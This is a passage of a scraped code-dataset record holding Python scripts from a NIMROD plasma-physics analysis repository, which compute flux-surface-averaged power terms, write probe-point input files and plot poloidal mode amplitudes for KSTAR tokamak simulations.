from dumpfile\n get_time(self):\n Returns time and step\n interpolate_fsa(self, radial = 'rhon', npts = 200, fsa = True)\n Creates interpolate of surface quantitites\n get_r_of_q(self, qvalue)\n Find the radial location of qvalue\n \"\"\"\n\n def __init__(self, dumpfile, nimrodin):\n \"\"\"\n Parameters\n ----------\n dumpfile : str\n Dumpfile name\n nimrodin : str\n Nimrod input file name (nimrod.in)\n \"\"\"\n\n self._dumpfile = dumpfile\n self._nimrodin = nimrodin\n self._time = None\n self._step = None\n self._eval = None\n self.grid = None\n self.fsa_power = {}\n self.dvar_dict = {}\n \n\n def dump(self, file):\n \"\"\"Writes data to a pickle file.\n\n Parameters\n ----------\n file : str\n Pickle file name to write to\n \"\"\"\n\n pickle.dump(self._dumpfile, file)\n pickle.dump(self._nimrodin, file)\n pickle.dump(self._time, file)\n pickle.dump(self._step, file)\n pickle.dump(self.nmodes, file)\n pickle.dump(self.nmax, file)\n pickle.dump(self.nphi, file)\n pickle.dump(self.phimax, file)\n pickle.dump(self.fsa_power, file)\n pickle.dump(self.dvar_dict, file)\n\n\n def load(self, file):\n \"\"\"Reads from a pickle file.\n\n Parameters\n ----------\n file : str\n Pickle file to read\n \"\"\"\n\n with open(file,'rb') as pickle_file:\n self._dumpfile = pickle.load(pickle_file)\n self._nimrodin = pickle.load(pickle_file)\n self._time = pickle.load(pickle_file)\n self._step = pickle.load(pickle_file)\n self.nmodes = pickle.load(pickle_file)\n self.nmax = pickle.load(pickle_file)\n self.nphi = pickle.load(pickle_file)\n self.phimax = pickle.load(pickle_file)\n self.fsa_power = pickle.load(pickle_file)\n self.dvar_dict = pickle.load(pickle_file)\n\n def read_dumptime(self):\n '''Read time and step from nimrod dumpfile\n \n Raises \n ------\n IOError\n If there is a problem reading the dumpfile\n '''\n\n with h5py.File(self._dumpfile, 'r') as h5file:\n try:\n self._time=h5file[\"dumpTime\"].attrs['vsTime']\n self._step=int(h5file[\"dumpTime\"].attrs['vsStep'])\n except:\n print(f\"Error reading time or step in {self._dumpfile}\")\n raise IOError\n\n def get_time(self):\n '''Returns time and step \n \n Returns\n -------\n float \n Time of current time slice\n int \n Step number of current time slice\n '''\n 
\n if self._time == None or self._step == None:\n self.read_dumptime\n return self._time, self._step\n\n def interpolate_fsa(self, radial = 'rhon', npts = 200, fsa = True):\n \"\"\"Create interpolates of surface quantities as functions of\n the specified radial coordinate\n\n Parameters\n ----------\n radial : str, optional\n The name of the radial coordinate (default = rhon)\n npts : int, optional\n Number of points in interpolate (default = 200)\n fsa : bool, optional\n If true, normalize by v' (default = True)\n\n Raises \n ------\n KeyError\n If radial is not a reconized radial coordinate name \n \"\"\"\n\n RADIUS_TITLE = {\n 'rhon':r\"$\\rho_N$\",\n 'phi':r\"$\\Phi$\",\n 'psin':r\"$\\psi_N$\",\n 'psi':r\"$\\psi$\",\n }\n\n try:\n r_varable = self.dvar_dict[radial]\n except:\n print(f\"Radial variable {radial} is not reconized\")\n raise KeyError\n #use Radius Title to set default r_label\n self.r_label = RADIUS_TITLE.get(radial,radial)\n print(self.r_label)\n rmin=np.min(r_varable)\n rmax=np.max(r_varable)\n self.r = np.linspace(rmin,rmax,1000,endpoint=True)\n self.dvar_interp = {}\n self.fsa_interp = {}\n if fsa:\n fac = 1.0\n else:\n fac = np.abs(self.dvar_dict['vprime'])\n\n for key, item in self.dvar_dict.items():\n self.dvar_interp[key] = interp1d(r_varable, item,\n kind = 'cubic')(self.r)\n for key, item in self.fsa_power.items():\n self.fsa_interp[key] = interp1d(r_varable, item * fac,\n kind = 'cubic')(self.r)\n self.r_of_q = interp1d(self.dvar_dict['q'], r_varable,\n kind = 'cubic', fill_value = \"extrapolate\")\n\n def get_r_of_q(self, qvalue):\n \"\"\"Find the radial location of the input q value\n \n Parameters\n ----------\n qvalue : float\n The value of q \n\n Returns\n -------\n float\n The radial location of qvalue\n\n Raises\n ------\n ValueError\n If the input q value can not be found\n \"\"\"\n\n try:\n return self.r_of_q(qvalue)\n except:\n print(f\"The safety factor {qvalue} is not it the domain\")\n raise ValueError\n\n\n def set_evalnimrod(self):\n ''' Set up EvalNimrod instance '''\n\n # full fields is nvbtjpd\n # n is useful for testing, b is needed\n MRE_FIELDS = 'nb'\n if self._eval is None:\n self._eval = eval.EvalNimrod(self._dumpfile,\n fieldlist = MRE_FIELDS)\n return None\n\n @timer.timer_func\n def get_b(self, rzn, flag, abort=False):\n \"\"\"Evaluate b at a given point\n \n Parameters\n ----------\n rzn : np.ndarray\n Location of evaluation\n flag : integer\n If 0 only use eq, if 1 add n=0 to eq\n abort : bool\n Flag to raise an exception if true and can't find b\n\n Returns\n -------\n Real np.array\n Value of b at location\n\n Raises\n ------\n Exception\n If abort is false, and location is outside domain \n \"\"\"\n\n b = self._eval.eval_field('b', rzn, dmode=0)\n b0 = np.real(b[:])\n if (abort and np.isnan(b0).any()):\n print(b)\n raise Exception('get_b: Hit wall')\n return b0\n\n @timer.timer_func\n def find_pf_null(self, rzn, flag=0):\n \"\"\"Find a poloidal field null\n \n Parameters\n ----------\n rzn : np.ndarray\n Initial guess for poloidal field null\n flag : int \n If 0 only use b_eq, if 1 add b(n=0) to b_eq\n\n Returns\n -------\n np.ndarray\n RZ locations of pf null if succesful\n\n Raises\n ------\n Exception\n If cannot converge of a fixed point \n \"\"\"\n\n rzn = np.array(rzn)\n MAXSTEPS = 1000\n RTOL = 1.e-8\n it = 0\n drz0 = 0.125 * rzn[0]\n while True:\n b = self.get_b(rzn, flag, abort = False)\n norm0 = np.sqrt(b[0]**2 + b[1]**2)\n rvn = -rzn[0] * b[1] / norm0\n zvn = rzn[0] * b[0] / norm0\n drz = drz0 * (1.0 - float(it) / 
MAXSTEPS) + RTOL * rzn[0]\n while True:\n rr = rzn[0] + rvn * drz\n zz = rzn[1] + zvn * drz\n rzng = np.array([rr, zz, 0.0])\n b = self.get_b(rzng, flag, abort=False)\n if not np.isnan(b).any():\n norm = np.sqrt(b[0]**2 + b[1]**2)\n if (norm < norm0):\n rzn[:] = rzng[:]\n break\n rr = rzn[0] - rvn * drz\n zz = rzn[1] - zvn * drz\n rzng=np.array([rr, zz, 0.0])\n b = self.get_b(rzng, flag, abort=False)\n if not np.isnan(b).any():\n norm = np.sqrt(b[0]**2 + b[1]**2)\n if (norm < norm0):\n rzn[:] = rzng[:]\n break\n drz= drz / 2.0\n if (drz / rzn[0] < RTOL):\n return rzn # done\n it += 1\n if it >= MAXSTEPS:\n raise Exception('FSA find_pf_null: No convergence')\n return None\n\n @timer.timer_func\n def mre_surf_int(self, rzc, y, dy, evalnimrod, fargs):\n \"\"\"Integrand for flux surface integrates for MRE analysis \n\n Parameters\n ----------\n rzc : np.array of length 3\n Current RZC location\n y : np.array \n Vector storing current values of y\n dy : np.array\n Vector storing current values of dy\n evalnimrod : evalnimrod \n Instancation of evalnimrod class to evaluate fields at RZC\n fargs : dict\n Dictionary of additional arguments (kw does not work here)\n\n Returns\n -------\n np.array\n Upadated dy with mre specific datum\n \"\"\"\n\n addpert=fargs.get(\"addpert\",True)\n grid=self.set_fsagrid(rzc[0],rzc[1])\n# self.fields.clean_up_fsa()\n# self.fields.powerFlux(grid)\n# self.fields.advectPowerFlux(grid)\n\n # dy[0-3] are used\n fac = fargs['sfac']\n minidx = fargs['nmin']\n idx = 4\n\n# for key, item in self.fields.powerFluxDict.items():\n# dy[idx:idx+self.nmodes]=(fac*item[minidx:minidx+self.nmodes] + 1.0)*dy[2]\n# idx += self.nmodes\n# for key, item in self.fields.advectDict.items():\n# dy[idx:idx+self.nmodes]=(fac*item[minidx:minidx+self.nmodes] + 1.0)*dy[2]\n# idx += self.nmodes\n return dy\n\n @timer.timer_func\n def mre_analysis(self, eq_flag=0):\n \"\"\"Main routine for performing MRE analysis\n\n Parameters\n ----------\n eq_flag : int\n Use eq fields if 0, use eq + n=0 fields if 1 \n \"\"\"\n self.set_evalnimrod()\n rzo = np.array([1.76821,-0.0188439,0.0])\n o_point = self.find_pf_null(rzo, flag=eq_flag)\n b0 = self.get_b(o_point, eq_flag, abort = True)\n print(o_point, b0)\n r0 = o_point[0]\n bt0 = b0[2]\n print(r0, bt0)\n pass\n\n##### ignore below the point\n def set_2dgrid(self,start,stop,npts,debug=0):\n '''sets up a 2d grid, using non to determine the number of phi planes\n based on\n '''\n p1 = np.array([start[0], start[1], 0.0])\n p2 = np.array([stop[0], stop[1], 0.0])\n p3 = np.array([start[0], start[1], self.phimax])\n rzp2d = pn.PlotNimrod.grid_2d_gen(p1, p2, p3, npts,self.nphi)\n# self.fields.grid=eval.EvalGrid(rzp2d)\n# self.fields.grid.set_debug(debug)\n\n @staticmethod\n def calc_nmodes(lphi):\n nmodes=int(2**lphi/3)+1\n return nmodes\n\n @staticmethod\n def calc_nplanes(lphi):\n nplanes = 2**lphi\n return nplanes\n\n def set_phiplanes(self):\n self.nmodes = self.calc_nmodes(self.lphi)\n self.nmax = self.nmodes-1\n self.nphi = self.calc_nplanes(self.lphi)\n self.phimax = np.pi*2*(self.nphi-1)/self.nphi\n\n\n def set_fsagrid(self,r,z):\n rzp = np.array([np.broadcast_to(r,self.nphi),\n np.broadcast_to(z,self.nphi),\n np.linspace(0,self.phimax,self.nphi)])\n return rzp\n\n\n def find_comp_boundary(self,inpoint,outpoint,tol=1e-8,debug=False):\n index=0\n maxit=100\n ntest=self._eval.eval_field('n', outpoint, dmode = 0, eq = 1)\n if ntest == ntest:\n '''return if outpoint is in domain'''\n return outpoint\n fst=np.copy(inpoint)\n lst=np.copy(outpoint)\n if debug:\n 
print(fst,inpoint)\n print(lst,outpoint)\n dist=np.linalg.norm(lst-fst,2)\n if dist<tol:\n return fst\n while True:\n tst=(fst+lst)/2.0\n if debug:\n print(tst)\n ntest=self._eval.eval_field('n',tst,dmode=0,eq=1)\n if ntest ==ntest:\n fst=tst\n else:\n lst=tst\n dist=np.linalg.norm(lst-fst,2)\n if debug:\n print(dist)\n if dist<tol:\n break\n index+=1\n if index>maxit:\n print(\"no convergence\")\n break\n if debug:\n print(fst)\n print(lst)\n return fst\n\n\n\n \n\n\n @timer.timer_func\n def calculate_power_fsa(self,rzo=None,rzx=None,nsurf=100,eqflag=0,fargs={},**kwargs):\n# self.fields.set_method(\"powerflux\")\n\n dpow=kwargs.get('dpow',0.5)\n nmax = kwargs.get('nmax',5)\n rzo=np.array([1.76821,-0.0188439,0.0])\n oPoint=self.find_pf_null(rzo, flag=0)\n rzx=np.array([1.27,-1.14,0.0])\n xPoint=self.find_pf_null(rzx, flag=0)\n #find rmax\n rzmax=np.copy(oPoint)\n rzmax[0]=3.0\n rzmax=self.find_comp_boundary(oPoint,rzmax)\n #self.set_2dgrid(oPoint,rzmax,npts)\n print('rzmax',rzmax)\n\n\n self.fsa=True\n fargs['rtol']=1.e-8\n fargs['sfac']=1.e-2\n fargs['nmin']=1\n fargs['nmax']=5\n self.nmodes=nmax-fargs['nmin']+1\n self.nmax=nmax\n\n #to check nmax < nmodes\n #\n\n#skip q integration\n# dvar, yvar, contours = fsa.FSA(self.fields.eval, rzo, self.dummy_fsa, 1, \\\n# nsurf=nsurf,depvar='eta',dpow=0.5,rzx=rzx,flag=eqflag,normalize=True, \\\n# fargs=fargs)\n\n# iend=-1\n# while np.isnan(yvar[:,iend]).any():\n# iend -= 1\n# iend += yvar.shape[1]+1\n# #unevaluated interpoate\n# self.qpsi=interp1d(dvar[2,:iend], dvar[7,:iend], kind='cubic',fill_value=\"extrapolate\")\n\n\n #call induction at opoint to get number of fields\n# self.fields.clean_up_fsa()\n# self.fields.powerFlux(grid=self.set_fsagrid(*rzo[0:2]))\n# self.fields.advectPowerFlux(grid=self.set_fsagrid(*rzo[0:2]))\n\n neq=0\n# neq += len(self.fields.powerFluxDict) * self.nmodes\n# neq += len(self.fields.advectDict) * self.nmodes\n# self.fields.clean_up_fsa()\n\n# dvar,yvar,contours = fsa.FSA(self.fields.eval, rzo, self.power_fsa_int, neq, \\\n# nsurf=nsurf,depvar='eta', dpow=dpow, flag=eqflag, normalize=False,\\\n# **fargs)\n iend=-1\n while np.isnan(yvar[:,iend]).any():\n iend -= 1\n iend += yvar.shape[1]+1\n\n #dvars\n self.dvar_dict={}\n self.dvar_dict['psin']=dvar[0,:iend]\n self.dvar_dict['rhon']=dvar[1,:iend]\n self.dvar_dict['psi']=dvar[2,:iend]\n self.dvar_dict['phi']=dvar[3,:iend] #\"toroidal flux\"\n self.dvar_dict['vprime']=dvar[6,:iend]\n self.dvar_dict['q']=dvar[7,:iend]\n\n idx=0\n self.fsa_power = {}\n# for key in self.fields.powerFluxDict:\n# self.fsa_power[key] = \\\n# (yvar[idx:idx+self.nmodes,:iend] - dvar[6,:iend]) / \\\n# (fargs['sfac'] * dvar[6,:iend])\n# idx += self.nmodes\n# for key in self.fields.advectDict:\n# self.fsa_power[key] = \\\n# (yvar[idx:idx+self.nmodes,:iend] - dvar[6,:iend]) / \\\n# (fargs['sfac'] * dvar[6,:iend])\n# idx += self.nmodes\n\n\n rhomin=np.min(dvar[1,:iend])\n rhomax=np.max(dvar[1,:iend])\n self.rhon = np.linspace(rhomin,rhomax,200,endpoint=True)\n\n # self.raw_bcmn=bcmn\n # self.raw_bsmn=bsmn\n # self.raw_bmn_amp=bmn_amp\n # self.raw_bmn_phase =bmn_phase\n\n # self.interpolate_fsa()\n\n # neq=1+nterm*self.nfour*(4*self.mmax+1)\n # fig = plt.figure(figsize=(10,8))\n # ax=fig.add_subplot(111)\n # conf=plt.plot(self.rhon,self.q)\n # plt.show()\n\n # fig =plt.figure(figsize=(10,8))\n # ax=fig.add_subplot(111)\n # conf=plt.plot(self.rhon,self.bmn_amp[0,2,:])\n # plt.show()\n\n # fig =plt.figure(figsize=(10,8))\n # ax=fig.add_subplot(111)\n # conf=plt.plot(self.rhon,self.bmn_phase[0,2,:])\n # 
plt.show()\n\n return None\n\n def default_plot(self, fig_size = [8,6],qlist=None):\n\n DEFAULT_q = [-1.2, -1.5, -2, -3, -4]\n if not qlist:\n qlist = DEFAULT_q\n\n lin_power=self.fsa_interp['vxbeq'] + \\\n self.fsa_interp['jxbeq'] + \\\n self.fsa_interp['ngpp']\n qua_power=self.fsa_interp['vxbn0'] + self.fsa_interp['jxbn0']\n non_power=self.fsa_interp['vxbp'] + self.fsa_interp['jxbp']\n ohm_power=self.fsa_interp['etajp']\n visc_power=self.fsa_interp['divpip']\n neoi_power=self.fsa_interp['divPii']\n neoe_power=self.fsa_interp['divPie']\n poyn_power=self.fsa_interp['poynting']\n adv_power=self.fsa_interp['rhovdveq'] + \\\n self.fsa_interp['rhovdvn0'] + \\\n self.fsa_interp['rhovdvp']\n\n try:\n poyndis_power = self.fsa_interp['poyndis']\n poynlin_power = self.fsa_interp['poynlin']\n poynqln_power = self.fsa_interp['poynqln']\n poynnon_power = self.fsa_interp['poynnon']\n except:\n pass\n total_power = np.zeros_like(adv_power)\n skip_list = ['poyndis', 'poynlin', 'poynqln', 'poynnon']\n for key, item in self.fsa_interp.items():\n if key not in skip_list:\n total_power+=item\n\n #total_power -= self.fsa_interp['divpip']\n diss_power = ohm_power + neoi_power + neoe_power+ visc_power\n\n ## DEBUG:\n #print(np.max(self.dvar_dict['phi']))\n #print(np.min(self.dvar_dict['phi']))\n #fig, ax = plt.subplots(figsize=fig_size)\n #ax.plot(self.dvar_dict['phi'],marker='+')\n #plt.show()\n ##return\n\n y_label = r\"$\\Omega_n$ [MW/m^3]\"\n y_label = r\"$\\Omega_n$ [MW/m]\"\n xlim = [0,0.85]\n max_idx = -1\n while np.max(self.r[:max_idx])>0.9:\n max_idx -= 1\n\n nmin = self.nmax+1 -self.nmodes\n nlist = range(nmin,self.nmax+1)\n for idx,nn in enumerate(nlist):\n fig, ax = plt.subplots(figsize=fig_size)\n\n ax.plot(self.r[:max_idx], total_power[idx,:max_idx]/10**6, alpha=0.7, label=\"Total\",color='tab:brown')\n ax.plot(self.r[:max_idx], lin_power[idx,:max_idx]/10**6, alpha=0.7, label=\"Lin\",color='tab:orange')\n ax.plot(self.r[:max_idx], qua_power[idx,:max_idx]/10**6, alpha=0.7, label=\"QL\",color ='tab:green')\n ax.plot(self.r[:max_idx], non_power[idx,:max_idx]/10**6, alpha=0.7, label=\"NL\",color='tab:red')\n ax.plot(self.r[:max_idx], diss_power[idx,:max_idx]/10**6, alpha=0.7, label=\"Diss\",color='tab:purple')\n ax.plot(self.r[:max_idx], poyn_power[idx,:max_idx]/10**6, alpha=0.7, label=\"PF\",color='tab:blue')\n\n\n title = f\"n={nn} power at {self._time*1000:.2f}ms\"\n\n for q in qlist:\n print(q)\n try:\n rq = self.get_r_of_q(q)\n print(rq)\n ax.axvline(rq,ls=':')\n except:\n print(\"could not find q\")\n pass\n plt.legend(ncol=2, loc='upper left', fontsize = 18, frameon=True, framealpha=0.8,handlelength=1)\n\n ax.set(xlabel=self.r_label, ylabel=y_label, title=title, xlim=xlim)\n\n plt.axhline(0,color='k')\n #ax.ticklabel_format(axis='both', style='sci', scilimits=(10**3,10**-3),\n # useOffset=None, useLocale=None, useMathText=True)\n\n plt.tight_layout()\n plt.show()\n### plot 2\n for idx,nn in enumerate(nlist):\n fig, ax = plt.subplots(figsize=fig_size)\n\n ax.plot(self.r[:max_idx], total_power[idx,:max_idx]/10**6, alpha=0.7, label=\"Total\",color='tab:brown')\n #ax.plot(self.r[:max_idx], (lin_power[idx,:max_idx]+poynlin_power[idx,:max_idx])/10**6, alpha=0.7, label=\"Lin+LPF\",color='tab:orange')\n #ax.plot(self.r[:max_idx], (qua_power[idx,:max_idx]+poynqln_power[idx,:max_idx])/10**6, alpha=0.7, label=\"QL+QPF\",color ='tab:green')\n ax.plot(self.r[:max_idx], (non_power[idx,:max_idx])/10**6, alpha=0.7, label=\"NL\",color='tab:red')\n #ax.plot(self.r[:max_idx], 
(diss_power[idx,:max_idx]+poyndis_power[idx,:max_idx])/10**6, alpha=0.7, label=\"Diss+DPF\",color='tab:purple')\n #ax.plot(self.r[:max_idx], poyn_power[idx,:max_idx]/10**6, alpha=0.7, label=\"PF\",color='tab:blue')\n\n\n title = f\"n={nn} power at {self._time*1000:.2f}ms\"\n qlist2 = [-1.2,-4/3, -1.5,-5/3, -2, -3, -4]\n c2list = ['tab:blue','tab:red','tab:blue','tab:red','tab:blue','tab:blue','tab:blue']\n idx =0\n for q in qlist2:\n print(q)\n try:\n rq = self.get_r_of_q(q)\n print(rq)\n ax.axvline(rq,ls=':',color = c2list[idx])\n idx+=1\n except:\n print(\"could not find q\")\n pass\n plt.legend(ncol=1, loc='upper left', fontsize = 18, frameon=True, framealpha=0.8,handlelength=1)\n ax.set(xlabel=self.r_label, ylabel=y_label, title=title, xlim=xlim)\n\n\n #ax.ticklabel_format(axis='both', style='sci', scilimits=(10**3,10**-3),\n # useOffset=None, useLocale=None, useMathText=True)\n plt.axhline(0,color='k')\n plt.tight_layout()\n plt.show()\n#plot 2b\n for idx,nn in enumerate(nlist):\n fig, ax = plt.subplots(figsize=fig_size)\n\n ax.plot(self.r[:max_idx], total_power[idx,:max_idx]/10**6, alpha=0.7, label=\"Total\",color='tab:brown')\n ax.plot(self.r[:max_idx], (lin_power[idx,:max_idx]+poyn_power[idx,:max_idx])/10**6, alpha=0.7, label=\"Lin+PF\",color='tab:orange')\n ax.plot(self.r[:max_idx], (qua_power[idx,:max_idx])/10**6, alpha=0.7, label=\"QL\",color ='tab:green')\n ax.plot(self.r[:max_idx], (non_power[idx,:max_idx])/10**6, alpha=0.7, label=\"NL\",color='tab:red')\n ax.plot(self.r[:max_idx], (diss_power[idx,:max_idx])/10**6, alpha=0.7, label=\"Diss\",color='tab:purple')\n# ax.plot(self.r[:max_idx], poyn_power[idx,:max_idx]/10**6, alpha=0.7, label=\"PF\",color='tab:blue')\n\n\n title = f\"n={nn} power at {self._time*1000:.2f}ms\"\n qlist2 = [-1.2,-4/3, -1.5,-5/3, -2, -3, -4]\n c2list = ['tab:blue','tab:red','tab:blue','tab:red','tab:blue','tab:blue','tab:blue']\n idx =0\n for q in qlist2:\n print(q)\n try:\n rq = self.get_r_of_q(q)\n print(rq)\n ax.axvline(rq,ls=':',color = c2list[idx])\n idx+=1\n except:\n print(\"could not find q\")\n pass\n plt.legend(ncol=1, loc='upper left', fontsize = 18, frameon=True, framealpha=0.8,handlelength=1)\n\n ax.set(xlabel=self.r_label, ylabel=y_label, title=title, xlim=xlim)\n\n\n #ax.ticklabel_format(axis='both', style='sci', scilimits=(10**3,10**-3),\n # useOffset=None, useLocale=None, useMathText=True)\n plt.axhline(0,color='k')\n plt.tight_layout()\n plt.show()\n#plot 3\n for idx,nn in enumerate(nlist):\n fig, ax = plt.subplots(figsize=fig_size)\n\n ax.plot(self.r[:max_idx], (lin_power[idx,:max_idx]+poynlin_power[idx,:max_idx])/10**6, alpha=0.7, label=\"lin+poy\")\n ax.plot(self.r[:max_idx], qua_power[idx,:max_idx]/10**6, alpha=0.7, label=\"qlin\")\n ax.plot(self.r[:max_idx], (non_power[idx,:max_idx])/10**6, alpha=0.7, label=\"non\")\n ax.plot(self.r[:max_idx], (non_power[idx,:max_idx]+poynnon_power[idx,:max_idx])/10**6, alpha=0.7, label=\"non+poy\")\n ax.plot(self.r[:max_idx], diss_power[idx,:max_idx]/10**6, alpha=0.7, label=\"diss\")\n ax.plot(self.r[:max_idx], total_power[idx,:max_idx]/10**6, alpha=0.7, label=\"tot\")\n\n\n title = f\"n={nn} power at {self._time*1000:.2f}ms\"\n\n for q in qlist:\n print(q)\n try:\n rq = self.get_r_of_q(q)\n print(rq)\n ax.axvline(rq,ls=':')\n except:\n print(\"could not find q\")\n pass\n ax.legend(loc='best',ncol=2)\n\n ax.set(xlabel=self.r_label, ylabel=y_label, xlim=xlim, title=title)\n\n\n #ax.ticklabel_format(axis='both', style='sci', scilimits=(10**3,10**-3),\n # useOffset=None, useLocale=None, 
useMathText=True)\n\n plt.tight_layout()\n plt.show()\n\n for idx,nn in enumerate(nlist):\n fig, ax = plt.subplots(figsize=fig_size)\n\n ax.plot(self.r[:max_idx], visc_power[idx,:max_idx]/10**6, alpha=0.7, label=\"visc\")\n ax.plot(self.r[:max_idx], neoe_power[idx,:max_idx]/10**6, alpha=0.7, label=\"neoe\")\n ax.plot(self.r[:max_idx], neoi_power[idx,:max_idx]/10**6, alpha=0.7, label=\"neoi\")\n ax.plot(self.r[:max_idx], ohm_power[idx,:max_idx]/10**6, alpha=0.7, label=\"ohm\")\n #ax.plot(self.r[:max_idx], adv_power[idx,:max_idx]/10**6, alpha=0.7, label=\"adv\")\n\n\n title = f\"n={nn} power at {self._time*1000:.2f}ms\"\n\n for q in qlist:\n print(q)\n try:\n rq = self.get_r_of_q(q)\n print(rq)\n ax.axvline(rq,ls=':')\n except:\n print(\"could not find q\")\n pass\n ax.legend(loc='best',ncol=2)\n\n ax.set(xlabel=self.r_label, ylabel=y_label, xlim=xlim, title=title)\n\n\n #ax.ticklabel_format(axis='both', style='sci', scilimits=(10**3,10**-3),\n # useOffset=None, useLocale=None, useMathText=True)\n\n plt.tight_layout()\n plt.show()\n\n\n return\n def clean_up(self):\n ''' Clean up fields to reduce memory foot print'''\n# self.fields.clean_up()\n self.grid=None\n" }, { "alpha_fraction": 0.6320388317108154, "alphanum_fraction": 0.6611650586128235, "avg_line_length": 22.953489303588867, "blob_id": "d1566d36733a400add3ad6a5b4cbe5ddd9c7066a", "content_id": "b2caad11ced0167b179b4e1f614617f9c306883d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1030, "license_type": "no_license", "max_line_length": 66, "num_lines": 43, "path": "/trip2Nim/write_probe_points.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n\n\n\nimport os\nimport numpy as np\nimport sys\nimport matplotlib.pyplot as plt\n\n\n\nhomeDir = os.environ['HOME']\nscratchDir = homeDir + '/SCRATCH/'\nwrkDir = 'KSTAR/19118_2950_C1wall/22062201_probeg/'\n\nnimBdry = 'nimrod_bdry_rz.txt'\nrzFile = 'probe.points.rz.in'\n\nphiPlanes = 256\n\n\n\n############## Start of code ###################\nfullNimBdry = scratchDir+wrkDir+nimBdry\nfullRzFile = scratchDir+wrkDir+rzFile\nnodeRZ = np.loadtxt(fullNimBdry,delimiter=',',skiprows=1)\nprint(nodeRZ.shape)\n\nrzpts = nodeRZ.shape[0]\nprobeFile = open(fullRzFile,'w')\nprobeFile.write(\"&startptsrz\\n\")\nprobeFile.write(\"\\n\")\nprobeFile.write(\" nptsrz = \" + str(rzpts) + \"\\n\")\nprobeFile.write(\" phinrz = 0 \\n\")\nprobeFile.write(\" nphinrz = \" + str(phiPlanes)+ \"\\n\")\nprobeFile.write(\"\\n\")\nprobeFile.write(\" ptsrz(1:2, 1:\" + str(rzpts) + \") = \\n\")\nfor ii in range(rzpts):\n thisStr = \" \" + str(nodeRZ[ii,0]) + \" \" + str(nodeRZ[ii,1]) \n probeFile.write(thisStr + \"\\n\")\nprobeFile.write(\"\\n\")\nprobeFile.write(\"&END\")\nprobeFile.close()\n" }, { "alpha_fraction": 0.6027638912200928, "alphanum_fraction": 0.658629834651947, "avg_line_length": 27.82203483581543, "blob_id": "7f583f72f17cb47d78b105860db74100d14b30f8", "content_id": "09cac78089818e77be75645616412b2beeccc635", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3401, "license_type": "no_license", "max_line_length": 90, "num_lines": 118, "path": "/surfmn/test_surfmn.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\nimport fsa_surfmn as surfmn\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as mcolors\n\ncase =2\nif case==0:\n dumpfile = \"dumpgll.10000.h5\"\n nimrodin 
= \"nimrod.in\"\n time=0.541\nelif case ==1:\n dumpfile = \"dumpgll.28000.h5\"\n nimrodin = \"nimrod.in\"\n time=1.784\nelif case ==2:\n dumpfile = \"dumpgll.66000.h5\"\n nimrodin = \"nimrod.in\"\n time=5.000\nelse:\n print(f\"Case {case} not recognized\")\n raise\n\nsurf=surfmn.fsasurfmn(dumpfile,nimrodin)\nrzo=np.array([1.768,-0.018831,0.0])\nfargs={}\neqflag=1\nmmax=15\nn_max=5\nfargs['ifour']=list(range(1,n_max+1))\nfargs['mmax']=mmax\nsurf.calculate(rzo=rzo,nsurf=150,eqflag=eqflag,fargs=fargs)\n\n\nq1list=[-4,-3,-2]\nm1list=list(range(-4,0))\nq2list=[-4,-3,-2.5,-2,-1.5]\nm2list=list(range(-8,0))\nq3list=[-3,-2.33, -2,-1.67,-1.33]\nm3list=list(range(-12,-3))\nq4list=[-3,-2,-1.75,-1.5,-1.25]\nm4list=list(range(-15,-6))\nq5list=[-3,-2,-1.8,-1.6,-1.4,-1.2]\nm5list=list(range(-15,-6))\n\nqlists=[q1list,q2list,q3list,q4list,q5list]\nmlists=[m1list,m2list,m3list,m4list,m5list]\n\n#fig=plt.figure(figsize=(8,8))\n#ax=fig.add_subplot(111)\n#plt.plot(surf.rhon,-1.0*surf.q)\n#plt.title(r\"Safety factor\",fontsize=16)\n#plt.ylabel(r'|q|',fontsize=16)\n#plt.xlabel(r'$\\rho_N$',fontsize=16)\n#plt.tight_layout()\n#plt.show()\n\nfor ii,imode in enumerate(fargs['ifour']):\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n title=f\"$\\psi$(n={int(imode)}) at {time:.3f}ms\"\n ylabel=f\"$\\psi_m$ [mWb]\"\n colorlist = list(mcolors.TABLEAU_COLORS)\n xlabel=r'$\\rho_N$'\n fontsize=18\n for im,this_m in enumerate(mlists[ii]):\n this_i = surf.get_m_index(this_m)\n if this_i!= None:\n mlbl = \"m = \" + str(this_m)\n tc=colorlist[im%len(colorlist)]\n ax.plot(surf.rhon,surf.bmn[ii,this_i,:]*1000, color=tc, label=mlbl)\n for iq,qq in enumerate(qlists[ii]):\n try:\n irho = surf.get_rho_q(qq)\n qlbl = f\"q = {qq:.2f}\"\n tc=colorlist[iq]\n ax.axvline(irho,ls=':',color=tc, label=qlbl)\n except:\n print(f\"q={qq:.2f} is not in the domain\")\n ax.axhline(0,ls='-',c='k')\n ax.legend(loc=0,frameon=True,fontsize=fontsize)\n plt.title(title,fontsize=fontsize)\n plt.xlabel(xlabel,fontsize=fontsize)\n plt.ylabel(ylabel,fontsize=fontsize)\n plt.tight_layout()\n plt.show()\n\n if True:\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n # Determine which field to plot and set titles and labels\n #fmn=np.copy(surf.psimnlist[ndex])\n title=f\"$\\psi$(n={int(imode)}) at {time:.3f}ms\"\n # set contour levels, i could generalize this further if needed\n levels=301\n vmax=np.amax(surf.bmn[ii,:,:])*1000\n levels=np.linspace(0,vmax,301)\n cbar_ticks=np.linspace(0,vmax,11)\n # Update plot based on keys in kwargs\n xlabel=\"Poloidal Mode Number m\"\n fontsize=18\n # set up mrange()\n qmin=np.amin(surf.q)\n qmax=np.amax(surf.q)\n mrange=np.linspace(qmin,qmax)\n #create the surfmn plot\n plt.set_cmap('nipy_spectral')\n m=range(-mmax,mmax+1)\n mv, rv = np.meshgrid(m, surf.rhon, sparse=False, indexing='ij')\n conf=plt.contourf(mv,rv,np.clip(surf.bmn[ii,:,:]*1000,0,None),levels=levels,vmax=vmax)\n plt.plot(imode*mrange,surf.get_rho_q(mrange),c='w')\n plt.title(title,fontsize=fontsize)\n plt.ylabel(r'$\\rho_N$',fontsize=fontsize)\n plt.xlabel(xlabel,fontsize=fontsize)\n cbar=fig.colorbar(conf,ticks=cbar_ticks)\n plt.xlim(-mmax,mmax)\n 